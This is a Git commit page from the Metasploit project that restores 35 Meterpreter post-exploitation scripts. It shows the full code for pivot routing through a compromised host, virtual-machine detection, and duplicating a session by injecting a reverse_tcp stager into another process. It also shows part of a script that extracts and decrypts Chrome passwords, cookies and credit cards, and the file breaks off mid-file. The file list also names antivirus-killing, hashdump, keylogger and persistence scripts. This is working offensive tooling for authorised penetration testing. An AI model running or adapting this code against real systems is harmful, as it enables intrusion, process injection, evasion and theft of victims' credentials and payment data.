Browse Source

Revert "delete meterpreter scripts with replacement post modules"

This reverts commit 13b06db48e.
William Vu 2 years ago
parent
commit
1791f209fa
35 changed files with 6560 additions and 0 deletions
  1. 209
    0
      scripts/meterpreter/autoroute.rb
  2. 359
    0
      scripts/meterpreter/checkvm.rb
  3. 153
    0
      scripts/meterpreter/duplicate.rb
  4. 244
    0
      scripts/meterpreter/enum_chrome.rb
  5. 292
    0
      scripts/meterpreter/enum_firefox.rb
  6. 101
    0
      scripts/meterpreter/enum_logged_on_users.rb
  7. 132
    0
      scripts/meterpreter/enum_powershell_env.rb
  8. 104
    0
      scripts/meterpreter/enum_putty.rb
  9. 124
    0
      scripts/meterpreter/enum_shares.rb
  10. 87
    0
      scripts/meterpreter/file_collector.rb
  11. 70
    0
      scripts/meterpreter/get_application_list.rb
  12. 177
    0
      scripts/meterpreter/get_filezilla_creds.rb
  13. 35
    0
      scripts/meterpreter/get_local_subnets.rb
  14. 64
    0
      scripts/meterpreter/get_valid_community.rb
  15. 381
    0
      scripts/meterpreter/getcountermeasure.rb
  16. 190
    0
      scripts/meterpreter/getgui.rb
  17. 109
    0
      scripts/meterpreter/getvncpw.rb
  18. 306
    0
      scripts/meterpreter/hashdump.rb
  19. 108
    0
      scripts/meterpreter/hostsedit.rb
  20. 212
    0
      scripts/meterpreter/keylogrecorder.rb
  21. 619
    0
      scripts/meterpreter/killav.rb
  22. 139
    0
      scripts/meterpreter/metsvc.rb
  23. 96
    0
      scripts/meterpreter/migrate.rb
  24. 219
    0
      scripts/meterpreter/packetrecorder.rb
  25. 259
    0
      scripts/meterpreter/persistence.rb
  26. 195
    0
      scripts/meterpreter/prefetchtool.rb
  27. 196
    0
      scripts/meterpreter/remotewinenum.rb
  28. 394
    0
      scripts/meterpreter/schelevator.rb
  29. 84
    0
      scripts/meterpreter/screen_unlock.rb
  30. 158
    0
      scripts/meterpreter/screenspy.rb
  31. 107
    0
      scripts/meterpreter/search_dwld.rb
  32. 210
    0
      scripts/meterpreter/service_permissions_escalate.rb
  33. 149
    0
      scripts/meterpreter/uploadexec.rb
  34. 141
    0
      scripts/meterpreter/webcam.rb
  35. 137
    0
      scripts/meterpreter/wmic.rb

+ 209
- 0
scripts/meterpreter/autoroute.rb View File

@@ -0,0 +1,209 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to improve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#
9
+# Meterpreter script for setting up a route from within a
10
+# Meterpreter session, without having to background the
11
+# current session.
12
+
13
+# Default options
14
+session = client
15
+subnet = nil
16
+netmask = "255.255.255.0"
17
+print_only = false
18
+remove_route = false
19
+remove_all_routes = false
20
+
21
+# Options parsing
22
+@@exec_opts = Rex::Parser::Arguments.new(
23
+  "-h" => [false, "Help and usage"],
24
+  "-s" => [true, "Subnet (IPv4, for example, 10.10.10.0)"],
25
+  "-n" => [true, "Netmask (IPv4, for example, 255.255.255.0"],
26
+  "-p" => [false, "Print active routing table. All other options are ignored"],
27
+  "-d" => [false, "Delete the named route instead of adding it"],
28
+  "-D" => [false, "Delete all routes (does not require a subnet)"]
29
+)
30
+
31
+@@exec_opts.parse(args) { |opt, idx, val|
32
+  v = val.to_s.strip
33
+  case opt
34
+  when "-h"
35
+    usage
36
+    raise Rex::Script::Completed
37
+  when "-s"
38
+    if v =~ /[0-9\x2e]+\x2f[0-9]{1,2}/
39
+      subnet,cidr = v.split("\x2f")
40
+      netmask = Rex::Socket.addr_ctoa(cidr.to_i)
41
+    else
42
+      subnet = v
43
+    end
44
+  when "-n"
45
+    if (0..32) === v.to_i
46
+      netmask = Rex::Socket.addr_ctoa(v.to_i)
47
+    else
48
+      netmask = v
49
+    end
50
+  when "-p"
51
+    print_only = true
52
+  when "-d"
53
+    remove_route = true
54
+  when "-D"
55
+    remove_all_routes = true
56
+  end
57
+}
58
+
59
+def delete_all_routes
60
+  if Rex::Socket::SwitchBoard.routes.size > 0
61
+    routes = []
62
+    Rex::Socket::SwitchBoard.each do |route|
63
+      routes << {:subnet => route.subnet, :netmask => route.netmask}
64
+    end
65
+    routes.each {|route_opts| delete_route(route_opts)}
66
+
67
+    print_status "Deleted all routes"
68
+  else
69
+    print_status "No routes have been added yet"
70
+  end
71
+  raise Rex::Script::Completed
72
+end
73
+
74
+# Identical functionality to command_dispatcher/core.rb, and
75
+# nearly identical code
76
+def print_routes
77
+  if Rex::Socket::SwitchBoard.routes.size > 0
78
+    tbl =	Msf::Ui::Console::Table.new(
79
+      Msf::Ui::Console::Table::Style::Default,
80
+      'Header'  => "Active Routing Table",
81
+      'Prefix'  => "\n",
82
+      'Postfix' => "\n",
83
+      'Columns' =>
84
+        [
85
+          'Subnet',
86
+          'Netmask',
87
+          'Gateway',
88
+        ],
89
+      'ColProps' =>
90
+        {
91
+          'Subnet'  => { 'MaxWidth' => 17 },
92
+          'Netmask' => { 'MaxWidth' => 17 },
93
+        })
94
+    ret = []
95
+
96
+    Rex::Socket::SwitchBoard.each { |route|
97
+      if (route.comm.kind_of?(Msf::Session))
98
+        gw = "Session #{route.comm.sid}"
99
+      else
100
+        gw = route.comm.name.split(/::/)[-1]
101
+      end
102
+      tbl << [ route.subnet, route.netmask, gw ]
103
+    }
104
+      print tbl.to_s
105
+  else
106
+    print_status "No routes have been added yet"
107
+  end
108
+  raise Rex::Script::Completed
109
+end
110
+
111
+# Yet another IP validator. I'm sure there's some Rex
112
+# function that can just do this.
113
+def check_ip(ip=nil)
114
+  return false if(ip.nil? || ip.strip.empty?)
115
+  begin
116
+    rw = Rex::Socket::RangeWalker.new(ip.strip)
117
+    (rw.valid? && rw.length == 1) ? true : false
118
+  rescue
119
+    false
120
+  end
121
+end
122
+
123
+# Adds a route to the framework instance
124
+def add_route(opts={})
125
+  subnet = opts[:subnet]
126
+  netmask = opts[:netmask] || "255.255.255.0" # Default class C
127
+  Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
128
+end
129
+
130
+# Removes a route to the framework instance
131
+def delete_route(opts={})
132
+  subnet = opts[:subnet]
133
+  netmask = opts[:netmask] || "255.255.255.0" # Default class C
134
+  Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session)
135
+end
136
+
137
+
138
+# Defines usage
139
+def usage()
140
+  print_status "Usage:   run autoroute [-r] -s subnet -n netmask"
141
+  print_status "Examples:"
142
+  print_status "  run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0"
143
+  print_status "  run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0"
144
+  print_status "  run autoroute -s 10.10.10.1/24              # CIDR notation is also okay"
145
+  print_status "  run autoroute -p                            # Print active routing table"
146
+  print_status "  run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route"
147
+  print_status "Use the \"route\" and \"ipconfig\" Meterpreter commands to learn about available routes"
148
+  print_error "Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module"
149
+end
150
+
151
+# Validates the command options
152
+def validate_cmd(subnet=nil,netmask=nil)
153
+  if subnet.nil?
154
+    print_error "Missing -s (subnet) option"
155
+    return false
156
+  end
157
+
158
+  unless(check_ip(subnet))
159
+    print_error "Subnet invalid (must be IPv4)"
160
+    usage
161
+    return false
162
+  end
163
+
164
+  if(netmask and !(Rex::Socket.addr_atoc(netmask)))
165
+    print_error "Netmask invalid (must define contiguous IP addressing)"
166
+    usage
167
+    return false
168
+  end
169
+
170
+  if(netmask and !check_ip(netmask))
171
+    print_error "Netmask invalid"
172
+    return usage
173
+  end
174
+  true
175
+end
176
+
177
+if print_only
178
+  print_routes()
179
+  raise Rex::Script::Completed
180
+end
181
+
182
+if remove_all_routes
183
+  delete_all_routes()
184
+  raise Rex::Script::Completed
185
+end
186
+
187
+raise Rex::Script::Completed unless validate_cmd(subnet,netmask)
188
+
189
+if remove_route
190
+  print_status("Deleting route to %s/%s..." % [subnet,netmask])
191
+  route_result = delete_route(:subnet => subnet, :netmask => netmask)
192
+else
193
+  print_status("Adding a route to %s/%s..." % [subnet,netmask])
194
+  route_result = add_route(:subnet => subnet, :netmask => netmask)
195
+end
196
+
197
+if route_result
198
+  print_good "%s route to %s/%s via %s" % [
199
+    (remove_route ? "Deleted" : "Added"),
200
+    subnet,netmask,client.sock.peerhost
201
+  ]
202
+else
203
+  print_error "Could not %s route" % [(remove_route ? "delete" : "add")]
204
+end
205
+
206
+if Rex::Socket::SwitchBoard.routes.size > 0
207
+  print_status "Use the -p option to list all active routes"
208
+end
209
+

+ 359
- 0
scripts/meterpreter/checkvm.rb View File

@@ -0,0 +1,359 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Meterpreter script for detecting if target host is a Virtual Machine
9
+# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
10
+# Version: 0.2.0
11
+session = client
12
+
13
+@@exec_opts = Rex::Parser::Arguments.new(
14
+  "-h" => [ false,"Help menu." ]
15
+)
16
+
17
+@@exec_opts.parse(args) { |opt, idx, val|
18
+  case opt
19
+  when "-h"
20
+    print_line("CheckVM -- Check various attributes on the target for evidence that it is a virtual machine")
21
+    print_line("USAGE: run checkvm")
22
+    print_line(@@exec_opts.usage)
23
+    raise Rex::Script::Completed
24
+  end
25
+}
26
+
27
+# Function for detecting if it is a Hyper-V VM
28
+def hypervchk(session)
29
+  begin
30
+    vm = false
31
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
32
+    sfmsvals = key.enum_key
33
+    if sfmsvals.include?("Hyper-V")
34
+      print_status("This is a Hyper-V Virtual Machine")
35
+      vm = true
36
+    elsif sfmsvals.include?("VirtualMachine")
37
+      print_status("This is a Hyper-V Virtual Machine")
38
+      vm = true
39
+    end
40
+    key.close
41
+  rescue
42
+  end
43
+
44
+  if not vm
45
+    begin
46
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
47
+      srvvals = key.enum_key
48
+      if srvvals.include?("vmicheartbeat")
49
+        print_status("This is a Hyper-V Virtual Machine")
50
+        vm = true
51
+      elsif srvvals.include?("vmicvss")
52
+        print_status("This is a Hyper-V Virtual Machine")
53
+        vm = true
54
+      elsif srvvals.include?("vmicshutdown")
55
+        print_status("This is a Hyper-V Virtual Machine")
56
+        vm = true
57
+      elsif srvvals.include?("vmicexchange")
58
+        print_status("This is a Hyper-V Virtual Machine")
59
+        vm = true
60
+      end
61
+    rescue
62
+    end
63
+  end
64
+  return vm
65
+end
66
+
67
+# Function for checking if it is a VMware VM
68
+def vmwarechk(session)
69
+  vm = false
70
+  begin
71
+  key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
72
+  srvvals = key.enum_key
73
+  if srvvals.include?("vmdebug")
74
+    print_status("This is a VMware Virtual Machine")
75
+    vm = true
76
+  elsif srvvals.include?("vmmouse")
77
+    print_status("This is a VMware Virtual Machine")
78
+    vm = true
79
+  elsif srvvals.include?("VMTools")
80
+    print_status("This is a VMware Virtual Machine")
81
+    vm = true
82
+  elsif srvvals.include?("VMMEMCTL")
83
+    print_status("This is a VMware Virtual Machine")
84
+    vm = true
85
+  end
86
+  key.close
87
+  rescue
88
+  end
89
+  if not vm
90
+    begin
91
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
92
+      if key.query_value('Identifier').data.downcase =~ /vmware/
93
+        print_status("This is a VMware Virtual Machine")
94
+        vm = true
95
+      end
96
+    rescue
97
+    end
98
+  end
99
+  if not vm
100
+    vmwareprocs = [
101
+      "vmwareuser.exe",
102
+      "vmwaretray.exe"
103
+    ]
104
+    vmwareprocs.each do |p|
105
+      session.sys.process.get_processes().each do |x|
106
+        if p == (x['name'].downcase)
107
+          print_status("This is a VMware Virtual Machine") if not vm
108
+          vm = true
109
+        end
110
+      end
111
+    end
112
+  end
113
+  key.close
114
+  return vm
115
+
116
+end
117
+# Function for checking if it is a Virtual PC VM
118
+def checkvrtlpc(session)
119
+  vm = false
120
+  vpcprocs = [
121
+    "vmusrvc.exe",
122
+    "vmsrvc.exe"
123
+  ]
124
+  vpcprocs.each do |p|
125
+    session.sys.process.get_processes().each do |x|
126
+      if p == (x['name'].downcase)
127
+        print_status("This is a VirtualPC Virtual Machine") if not vm
128
+        vm = true
129
+      end
130
+    end
131
+  end
132
+  if not vm
133
+    begin
134
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
135
+    srvvals = key.enum_key
136
+    if srvvals.include?("vpcbus")
137
+      print_status("This is a VirtualPC Virtual Machine")
138
+      vm = true
139
+    elsif srvvals.include?("vpc-s3")
140
+      print_status("This is a VirtualPC Virtual Machine")
141
+      vm = true
142
+    elsif srvvals.include?("vpcuhub")
143
+      print_status("This is a VirtualPC Virtual Machine")
144
+      vm = true
145
+    elsif srvvals.include?("msvmmouf")
146
+      print_status("This is a VirtualPC Virtual Machine")
147
+      vm = true
148
+    end
149
+    key.close
150
+    rescue
151
+    end
152
+  end
153
+  return vm
154
+end
155
+
156
+def vboxchk(session)
157
+  vm = false
158
+  vboxprocs = [
159
+    "vboxservice.exe",
160
+    "vboxtray.exe"
161
+  ]
162
+  vboxprocs.each do |p|
163
+    session.sys.process.get_processes().each do |x|
164
+      if p == (x['name'].downcase)
165
+        print_status("This is a Sun VirtualBox Virtual Machine") if not vm
166
+        vm = true
167
+      end
168
+    end
169
+  end
170
+  if not vm
171
+  begin
172
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
173
+    srvvals = key.enum_key
174
+    if srvvals.include?("VBOX__")
175
+      print_status("This is a Sun VirtualBox Virtual Machine")
176
+      vm = true
177
+    end
178
+  rescue
179
+  end
180
+  end
181
+  if not vm
182
+    begin
183
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
184
+    srvvals = key.enum_key
185
+    if srvvals.include?("VBOX__")
186
+      print_status("This is a Sun VirtualBox Virtual Machine")
187
+      vm = true
188
+    end
189
+    rescue
190
+    end
191
+  end
192
+  if not vm
193
+    begin
194
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
195
+    srvvals = key.enum_key
196
+    if srvvals.include?("VBOX__")
197
+      print_status("This is a Sun VirtualBox Virtual Machine")
198
+      vm = true
199
+    end
200
+    rescue
201
+    end
202
+  end
203
+  if not vm
204
+    begin
205
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
206
+    if key.query_value('Identifier').data.downcase =~ /vbox/
207
+      print_status("This is a Sun VirtualBox Virtual Machine")
208
+      vm = true
209
+    end
210
+    rescue
211
+    end
212
+  end
213
+  if not vm
214
+    begin
215
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System')
216
+    if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/
217
+      print_status("This is a Sun VirtualBox Virtual Machine")
218
+      vm = true
219
+    end
220
+    rescue
221
+    end
222
+  end
223
+  if not vm
224
+    begin
225
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
226
+    srvvals = key.enum_key
227
+    if srvvals.include?("VBoxMouse")
228
+      print_status("This is a Sun VirtualBox Virtual Machine")
229
+      vm = true
230
+    elsif srvvals.include?("VBoxGuest")
231
+      print_status("This is a Sun VirtualBox Virtual Machine")
232
+      vm = true
233
+    elsif srvvals.include?("VBoxService")
234
+      print_status("This is a Sun VirtualBox Virtual Machine")
235
+      vm = true
236
+    elsif srvvals.include?("VBoxSF")
237
+      print_status("This is a Sun VirtualBox Virtual Machine")
238
+      vm = true
239
+    end
240
+    key.close
241
+    rescue
242
+    end
243
+  end
244
+  return vm
245
+end
246
+
247
+def xenchk(session)
248
+  vm = false
249
+  xenprocs = [
250
+    "xenservice.exe"
251
+  ]
252
+  xenprocs.each do |p|
253
+    session.sys.process.get_processes().each do |x|
254
+      if p == (x['name'].downcase)
255
+        print_status("This is a Xen Virtual Machine") if not vm
256
+        vm = true
257
+      end
258
+    end
259
+  end
260
+  if not vm
261
+  begin
262
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
263
+    srvvals = key.enum_key
264
+    if srvvals.include?("Xen")
265
+      print_status("This is a Xen Virtual Machine")
266
+      vm = true
267
+    end
268
+  rescue
269
+  end
270
+  end
271
+  if not vm
272
+    begin
273
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
274
+    srvvals = key.enum_key
275
+    if srvvals.include?("Xen")
276
+      print_status("This is a Xen Virtual Machine")
277
+      vm = true
278
+    end
279
+    rescue
280
+    end
281
+  end
282
+  if not vm
283
+    begin
284
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
285
+    srvvals = key.enum_key
286
+    if srvvals.include?("Xen")
287
+      print_status("This is a Xen Virtual Machine")
288
+      vm = true
289
+    end
290
+    rescue
291
+    end
292
+  end
293
+  if not vm
294
+    begin
295
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
296
+    srvvals = key.enum_key
297
+    if srvvals.include?("xenevtchn")
298
+      print_status("This is a Xen Virtual Machine")
299
+      vm = true
300
+    elsif srvvals.include?("xennet")
301
+      print_status("This is a Xen Virtual Machine")
302
+      vm = true
303
+    elsif srvvals.include?("xennet6")
304
+      print_status("This is a Xen Virtual Machine")
305
+      vm = true
306
+    elsif srvvals.include?("xensvc")
307
+      print_status("This is a Xen Virtual Machine")
308
+      vm = true
309
+    elsif srvvals.include?("xenvdb")
310
+      print_status("This is a Xen Virtual Machine")
311
+      vm = true
312
+    end
313
+    key.close
314
+    rescue
315
+    end
316
+  end
317
+  return vm
318
+end
319
+
320
+def qemuchk(session)
321
+  vm = false
322
+  if not vm
323
+    begin
324
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
325
+      if key.query_value('Identifier').data.downcase =~ /qemu/
326
+        print_status("This is a QEMU/KVM Virtual Machine")
327
+        vm = true
328
+      end
329
+    rescue
330
+    end
331
+  end
332
+  if not vm
333
+    begin
334
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0')
335
+      if key.query_value('ProcessorNameString').data.downcase =~ /qemu/
336
+        print_status("This is a QEMU/KVM Virtual Machine")
337
+        vm = true
338
+      end
339
+    rescue
340
+    end
341
+  end
342
+
343
+  return vm
344
+
345
+end
346
+
347
+if client.platform =~ /win32|win64/
348
+  print_status("Checking if target is a Virtual Machine .....")
349
+  found = hypervchk(session)
350
+  found = vmwarechk(session) if not found
351
+  found = checkvrtlpc(session) if not found
352
+  found = vboxchk(session) if not found
353
+  found = xenchk(session) if not found
354
+  found = qemuchk(session) if not found
355
+  print_status("It appears to be physical host.") if not found
356
+else
357
+  print_error("This version of Meterpreter is not supported with this Script!")
358
+  raise Rex::Script::Completed
359
+end

+ 153
- 0
scripts/meterpreter/duplicate.rb View File

@@ -0,0 +1,153 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Author: Scriptjunkie
9
+# Uses a meterpreter session to spawn a new meterpreter session in a different process.
10
+# A new process allows the session to take "risky" actions that might get the process killed by
11
+# A/V, giving a meterpreter session to another controller, or start a keylogger on another
12
+# process.
13
+#
14
+
15
+#
16
+# Options
17
+#
18
+opts = Rex::Parser::Arguments.new(
19
+  "-h"  => [ false,  "This help menu"],
20
+  "-r"  => [ true,   "The IP of a remote Metasploit listening for the connect back"],
21
+  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4546)"],
22
+  "-w"  => [ false,  "Write and execute an exe instead of injecting into a process"],
23
+  "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
24
+  "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
25
+  "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
26
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
27
+)
28
+
29
+#
30
+# Default parameters
31
+#
32
+
33
+rhost    = Rex::Socket.source_address("1.2.3.4")
34
+rport    = 4546
35
+lhost    = "127.0.0.1"
36
+
37
+spawn = false
38
+autoconn = true
39
+inject   = true
40
+target_pid = nil
41
+target    = "notepad.exe"
42
+pay      = nil
43
+
44
+#
45
+# Option parsing
46
+#
47
+opts.parse(args) do |opt, idx, val|
48
+  case opt
49
+  when "-h"
50
+    print_line(opts.usage)
51
+    raise Rex::Script::Completed
52
+  when "-r"
53
+    rhost = val
54
+  when "-p"
55
+    rport = val.to_i
56
+  when "-P"
57
+    target_pid = val.to_i
58
+  when "-e"
59
+    target = val
60
+  when "-D"
61
+    autoconn = false
62
+  when "-w"
63
+    inject = false
64
+  when "-s"
65
+    spawn = true
66
+  end
67
+end
68
+
69
+print_status("Creating a reverse meterpreter stager: LHOST=#{rhost} LPORT=#{rport}")
70
+
71
+payload = "windows/meterpreter/reverse_tcp"
72
+pay = client.framework.payloads.create(payload)
73
+pay.datastore['LHOST'] = rhost
74
+pay.datastore['LPORT'] = rport
75
+mul = client.framework.exploits.create("multi/handler")
76
+mul.share_datastore(pay.datastore)
77
+mul.datastore['WORKSPACE'] = client.workspace
78
+mul.datastore['PAYLOAD'] = payload
79
+mul.datastore['EXITFUNC'] = 'process'
80
+mul.datastore['ExitOnSession'] = true
81
+print_status("Running payload handler")
82
+mul.exploit_simple(
83
+  'Payload'  => mul.datastore['PAYLOAD'],
84
+  'RunAsJob' => true
85
+)
86
+
87
+if client.platform =~ /win32|win64/
88
+  server = client.sys.process.open
89
+
90
+  print_status("Current server process: #{server.name} (#{server.pid})")
91
+
92
+  if ! inject
93
+    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
94
+    print_status("Meterpreter stager executable #{exe.length} bytes long")
95
+
96
+    #
97
+    # Upload to the filesystem
98
+    #
99
+    tempdir = client.sys.config.getenv('TEMP')
100
+    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
101
+    tempexe.gsub!("\\\\", "\\")
102
+
103
+    fd = client.fs.file.new(tempexe, "wb")
104
+    fd.write(exe)
105
+    fd.close
106
+    print_status("Uploaded the agent to #{tempexe} (must be deleted manually)")
107
+
108
+    #
109
+    # Execute the agent
110
+    #
111
+    print_status("Executing the agent with endpoint #{rhost}:#{rport}...")
112
+    pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
113
+  elsif ! spawn
114
+    # Get the target process name
115
+    print_status("Duplicating into #{target}...")
116
+
117
+    # Get the target process pid
118
+    if not target_pid
119
+      target_pid = client.sys.process[target]
120
+    end
121
+
122
+    if not target_pid
123
+      print_error("Could not access the target process")
124
+      print_status("Spawning a notepad.exe host process...")
125
+      note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
126
+      target_pid = note.pid
127
+    end
128
+  else
129
+    print_status("Spawning a #{target} host process...")
130
+    newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
131
+    target_pid = newproc.pid
132
+    if not target_pid
133
+      print_error("Could not create a process around #{target}")
134
+      raise Rex::Script::Completed
135
+    end
136
+  end
137
+
138
+  # Do the duplication
139
+  print_status("Injecting meterpreter into process ID #{target_pid}")
140
+  host_process = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
141
+  raw = pay.generate
142
+  mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
143
+
144
+  print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
145
+  print_status("Writing the stager into memory...")
146
+  host_process.memory.write(mem, raw)
147
+  host_process.thread.create(mem, 0)
148
+  print_status("New server process: #{target_pid}")
149
+
150
+else
151
+  print_error("This version of Meterpreter is not supported with this Script!")
152
+  raise Rex::Script::Completed
153
+end

+ 244
- 0
scripts/meterpreter/enum_chrome.rb View File

@@ -0,0 +1,244 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#
9
+# Script to extract data from a chrome installation.
10
+#
11
+# Author: Sven Taute <sven dot taute at gmail com>
12
+#
13
+
14
+require 'sqlite3'
15
+require 'yaml'
16
+
17
+if client.platform !~ /win32/
18
+  print_error("This version of Meterpreter is not supported with this Script!")
19
+  raise Rex::Script::Completed
20
+end
21
+@host_info = client.sys.config.sysinfo
22
+@chrome_files = [
23
+  { :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"},
24
+  { :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"},
25
+  { :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"},
26
+  { :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]},
27
+  { :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"},
28
+  { :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"},
29
+  { :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"},
30
+  { :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"},
31
+  { :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]},
32
+  { :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"},
33
+  { :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"},
34
+]
35
+@migrate = false
36
+@old_pid = nil
37
+@output_format = []
38
+
39
+opts = Rex::Parser::Arguments.new(
40
+  "-h" => [ false, "Help menu" ],
41
+  "-m" => [ false, "Migrate into explorer.exe"],
42
+  "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
43
+)
44
+
45
+opts.parse(args) { |opt, idx, val|
46
+  case opt
47
+  when "-m"
48
+    @migrate = true
49
+  when "-f"
50
+    if val =~ /^j(son)?$/
51
+      @output_format << "json"
52
+    elsif val =~ /^y(aml)?$/
53
+      @output_format << "yaml"
54
+    elsif val =~ /^t(ext)?$/
55
+      @output_format << "text"
56
+    else
57
+      print_error("unknown format '#{val}'.")
58
+      raise Rex::Script::Completed
59
+    end
60
+  when "-h"
61
+    print_line("")
62
+    print_line("DESCRIPTION: Script for enumerating preferences and extracting")
63
+    print_line("information from the Google Chrome Browser on a target system.")
64
+    print_line("Decryption of creditcard information and passwords only supported")
65
+    print_line("on 32bit Windows Operating Systems.")
66
+    print_line("")
67
+    print_line("USAGE: run enum_chrome [-m]")
68
+    print_line(opts.usage)
69
+    raise Rex::Script::Completed
70
+  end
71
+}
72
+
73
+@output_format << "json" if @output_format.empty?
74
+if @output_format.include?("json")
75
+  begin
76
+    require 'json'
77
+  rescue LoadError
78
+    print_error("JSON is not available.")
79
+    @output_format.delete("json")
80
+    if @output_format.empty?
81
+      print_status("Falling back to raw text output.")
82
+      @output_format << "text"
83
+    end
84
+  end
85
+end
86
+print_status("using output format(s): " + @output_format.join(", "))
87
+
88
+def prepare_railgun
89
+  rg = client.railgun
90
+  if (!rg.get_dll('crypt32'))
91
+    rg.add_dll('crypt32')
92
+  end
93
+
94
+  if (!rg.crypt32.functions["CryptUnprotectData"])
95
+    rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
96
+        ["PBLOB","pDataIn", "in"],
97
+        ["PWCHAR", "szDataDescr", "out"],
98
+        ["PBLOB", "pOptionalEntropy", "in"],
99
+        ["PDWORD", "pvReserved", "in"],
100
+        ["PBLOB", "pPromptStruct", "in"],
101
+        ["DWORD", "dwFlags", "in"],
102
+        ["PBLOB", "pDataOut", "out"]
103
+      ])
104
+  end
105
+end
106
+
107
+def decrypt_data(data)
108
+  rg = client.railgun
109
+  pid = client.sys.process.open.pid
110
+  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
111
+
112
+  mem = process.memory.allocate(1024)
113
+  process.memory.write(mem, data)
114
+
115
+  addr = [mem].pack("V")
116
+  len = [data.length].pack("V")
117
+  ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
118
+  len, addr = ret["pDataOut"].unpack("V2")
119
+  return "" if len == 0
120
+  decrypted = process.memory.read(addr, len)
121
+end
122
+
123
+def write_output(file, rows)
124
+  if @output_format.include?("json")
125
+    ::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) }
126
+  end
127
+  if @output_format.include?("yaml")
128
+    ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
129
+  end
130
+  if @output_format.include?("text")
131
+    ::File.open(file + ".txt", "w") do |f|
132
